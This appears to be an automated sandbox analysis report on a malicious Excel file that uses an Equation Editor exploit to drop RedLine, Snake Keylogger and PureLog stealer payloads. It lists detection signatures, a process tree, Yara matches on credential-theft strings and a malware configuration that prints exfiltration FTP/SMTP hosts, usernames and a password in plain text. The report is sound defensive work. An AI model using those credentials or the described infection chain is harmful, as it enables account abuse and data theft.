Edit tour

Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Sample name:	Orden de compra 0001-00255454.xlam.xlsx
Analysis ID:	1436299
MD5:	a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1:	27feddfa7d771ff519757beaac8c974330e14e1d
SHA256:	5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
Tags:	xlamxlsx
Infos:

Detection

PureLog Stealer, RedLine, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

Binary is likely a compiled AutoIt script file

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Installs new ROOT certificates

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1924 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

negrett.exe (PID: 1500 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: FBCCDD35EE6DCCADAEAA69E37FBBD171)

name.exe (PID: 2504 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: CF439A4CF698F8D15901A3CAA5F503FE)

RegSvcs.exe (PID: 1304 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)

wscript.exe (PID: 2644 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: 045451FA238A75305CC26AC982472367)

name.exe (PID: 2308 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: CF439A4CF698F8D15901A3CAA5F503FE)

RegSvcs.exe (PID: 2160 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x1bd2:$s1: <legacyDrawing r:id=" 0x1bfa:$s2: <oleObject progId=" 0x1c4c:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x64d48:$a1: get_encryptedPassword 0x64d1c:$a2: get_encryptedUsername 0x64de0:$a3: get_timePasswordChanged 0x64cf8:$a4: get_passwordField 0x64d5e:$a5: set_encryptedPassword 0x64b2b:$a7: get_logins 0x6120b:$a10: KeyLoggerEventArgs 0x611da:$a11: KeyLoggerEventArgsEventHandler 0x64bff:$a13: _encryptedPassword
0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x68153:$x1: $%SMTPDV$ 0x669bc:$x2: $#TheHashHere%& 0x6696a:$x3: %FTPDV$ 0x68229:$x4: $%TelegramDv$ 0x611da:$x5: KeyLoggerEventArgs 0x6120b:$x5: KeyLoggerEventArgs 0x6811f:$m2: Clipboard Logs ID 0x68325:$m2: Screenshot Logs ID 0x683f1:$m2: keystroke Logs ID 0x682fd:$m4: \SnakeKeylogger\
0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x226ab:$s2: SetHook 0x226e4:$s3: CallNextHook 0x22673:$s4: _hook
0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\
0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2927a:$a1: get_encryptedPassword 0x60192:$a1: get_encryptedPassword 0x2924e:$a2: get_encryptedUsername 0x60166:$a2: get_encryptedUsername 0x29312:$a3: get_timePasswordChanged 0x6022a:$a3: get_timePasswordChanged 0x2922a:$a4: get_passwordField 0x60142:$a4: get_passwordField 0x29290:$a5: set_encryptedPassword 0x601a8:$a5: set_encryptedPassword 0x2905d:$a7: get_logins 0x5ff75:$a7: get_logins 0x2573d:$a10: KeyLoggerEventArgs 0x5c655:$a10: KeyLoggerEventArgs 0x2570c:$a11: KeyLoggerEventArgsEventHandler 0x5c624:$a11: KeyLoggerEventArgsEventHandler 0x29131:$a13: _encryptedPassword 0x60049:$a13: _encryptedPassword
0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2c685:$x1: $%SMTPDV$ 0x6359d:$x1: $%SMTPDV$ 0x2aeee:$x2: $#TheHashHere%& 0x61e06:$x2: $#TheHashHere%& 0x2ae9c:$x3: %FTPDV$ 0x61db4:$x3: %FTPDV$ 0x2c75b:$x4: $%TelegramDv$ 0x63673:$x4: $%TelegramDv$ 0x2570c:$x5: KeyLoggerEventArgs 0x2573d:$x5: KeyLoggerEventArgs 0x5c624:$x5: KeyLoggerEventArgs 0x5c655:$x5: KeyLoggerEventArgs 0x2c651:$m2: Clipboard Logs ID 0x2c857:$m2: Screenshot Logs ID 0x2c923:$m2: keystroke Logs ID 0x63569:$m2: Clipboard Logs ID 0x6376f:$m2: Screenshot Logs ID 0x6383b:$m2: keystroke Logs ID 0x2c82f:$m4: \SnakeKeylogger\ 0x63747:$m4: \SnakeKeylogger\
0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24d0a:$a1: get_encryptedPassword 0x24cde:$a2: get_encryptedUsername 0x24da2:$a3: get_timePasswordChanged 0x24cba:$a4: get_passwordField 0x24d20:$a5: set_encryptedPassword 0x24aed:$a7: get_logins 0x211cd:$a10: KeyLoggerEventArgs 0x2119c:$a11: KeyLoggerEventArgsEventHandler 0x24bc1:$a13: _encryptedPassword
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a9ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29c30:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a063:$a4: \Orbitum\User Data\Default\Login Data 0x2b0a4:$a5: \Kometa\User Data\Default\Login Data
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x235f7:$s1: UnHook 0x23593:$s2: SetHook 0x235cc:$s3: CallNextHook 0x2355b:$s4: _hook
00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28115:$x1: $%SMTPDV$ 0x2697e:$x2: $#TheHashHere%& 0x2692c:$x3: %FTPDV$ 0x281eb:$x4: $%TelegramDv$ 0x2119c:$x5: KeyLoggerEventArgs 0x211cd:$x5: KeyLoggerEventArgs 0x280e1:$m2: Clipboard Logs ID 0x282e7:$m2: Screenshot Logs ID 0x283b3:$m2: keystroke Logs ID 0x282bf:$m4: \SnakeKeylogger\
0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 1304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 1304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f39a:$a1: get_encryptedPassword 0x3f36e:$a2: get_encryptedUsername 0x3f432:$a3: get_timePasswordChanged 0x3f34a:$a4: get_passwordField 0x3f3b0:$a5: set_encryptedPassword 0x3f186:$a7: get_logins 0x3b7dc:$a10: KeyLoggerEventArgs 0x3b7ab:$a11: KeyLoggerEventArgsEventHandler 0x3f251:$a13: _encryptedPassword
Process Memory Space: RegSvcs.exe PID: 1304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3b7ab:$x5: KeyLoggerEventArgs 0x3b7dc:$x5: KeyLoggerEventArgs 0x3b81c:$x5: KeyLoggerEventArgs 0x3b84b:$x5: KeyLoggerEventArgs 0x43021:$m2: Clipboard Logs ID 0x4311d:$m2: Screenshot Logs ID 0x43183:$m2: keystroke Logs ID 0x43109:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 2160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2160	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 2160	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13902:$a1: get_encryptedPassword 0x2a9d6:$a1: get_encryptedPassword 0x3b5a7:$a1: get_encryptedPassword 0x138d6:$a2: get_encryptedUsername 0x2a9aa:$a2: get_encryptedUsername 0x3b57b:$a2: get_encryptedUsername 0x1399a:$a3: get_timePasswordChanged 0x2aa6e:$a3: get_timePasswordChanged 0x3b63f:$a3: get_timePasswordChanged 0x138b2:$a4: get_passwordField 0x2a986:$a4: get_passwordField 0x3b557:$a4: get_passwordField 0x13918:$a5: set_encryptedPassword 0x2a9ec:$a5: set_encryptedPassword 0x3b5bd:$a5: set_encryptedPassword 0x136ee:$a7: get_logins 0x2a7c2:$a7: get_logins 0x3b393:$a7: get_logins 0xfd44:$a10: KeyLoggerEventArgs 0x26cf3:$a10: KeyLoggerEventArgs 0x379e9:$a10: KeyLoggerEventArgs
Process Memory Space: RegSvcs.exe PID: 2160	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xfd13:$x5: KeyLoggerEventArgs 0xfd44:$x5: KeyLoggerEventArgs 0xfd84:$x5: KeyLoggerEventArgs 0xfdb3:$x5: KeyLoggerEventArgs 0x26cc2:$x5: KeyLoggerEventArgs 0x26cf3:$x5: KeyLoggerEventArgs 0x26d33:$x5: KeyLoggerEventArgs 0x26d62:$x5: KeyLoggerEventArgs 0x379b8:$x5: KeyLoggerEventArgs 0x379e9:$x5: KeyLoggerEventArgs 0x37a29:$x5: KeyLoggerEventArgs 0x37a58:$x5: KeyLoggerEventArgs 0x17589:$m2: Clipboard Logs ID 0x17685:$m2: Screenshot Logs ID 0x176eb:$m2: keystroke Logs ID 0x2e6f4:$m2: Clipboard Logs ID 0x2e7f0:$m2: Screenshot Logs ID 0x2e856:$m2: keystroke Logs ID 0x3f22e:$m2: Clipboard Logs ID 0x3f32a:$m2: Screenshot Logs ID 0x3f390:$m2: keystroke Logs ID
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.name.exe.560000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.name.exe.560000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.820ee8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.820ee8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.820ee8.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.820ee8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.820ee8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword
9.2.RegSvcs.exe.820ee8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.820ee8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x226ab:$s2: SetHook 0x226e4:$s3: CallNextHook 0x22673:$s4: _hook
9.2.RegSvcs.exe.820ee8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.6a5f26.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.6a5f26.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.6a5f26.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.6a5f26.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22022:$a1: get_encryptedPassword 0x21ff6:$a2: get_encryptedUsername 0x220ba:$a3: get_timePasswordChanged 0x21fd2:$a4: get_passwordField 0x22038:$a5: set_encryptedPassword 0x21e05:$a7: get_logins 0x1e4e5:$a10: KeyLoggerEventArgs 0x1e4b4:$a11: KeyLoggerEventArgsEventHandler 0x21ed9:$a13: _encryptedPassword
12.2.RegSvcs.exe.6a5f26.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27d17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x26f48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2737b:$a4: \Orbitum\User Data\Default\Login Data 0x283bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.6a5f26.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2090f:$s1: UnHook 0x208ab:$s2: SetHook 0x208e4:$s3: CallNextHook 0x20873:$s4: _hook
12.2.RegSvcs.exe.6a5f26.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2542d:$x1: $%SMTPDV$ 0x23c96:$x2: $#TheHashHere%& 0x23c44:$x3: %FTPDV$ 0x25503:$x4: $%TelegramDv$ 0x1e4b4:$x5: KeyLoggerEventArgs 0x1e4e5:$x5: KeyLoggerEventArgs 0x253f9:$m2: Clipboard Logs ID 0x255ff:$m2: Screenshot Logs ID 0x256cb:$m2: keystroke Logs ID 0x255d7:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.820000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.820000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.820000.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.820000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22f0a:$a1: get_encryptedPassword 0x22ede:$a2: get_encryptedUsername 0x22fa2:$a3: get_timePasswordChanged 0x22eba:$a4: get_passwordField 0x22f20:$a5: set_encryptedPassword 0x22ced:$a7: get_logins 0x1f3cd:$a10: KeyLoggerEventArgs 0x1f39c:$a11: KeyLoggerEventArgsEventHandler 0x22dc1:$a13: _encryptedPassword
12.2.RegSvcs.exe.3416458.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.3416458.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
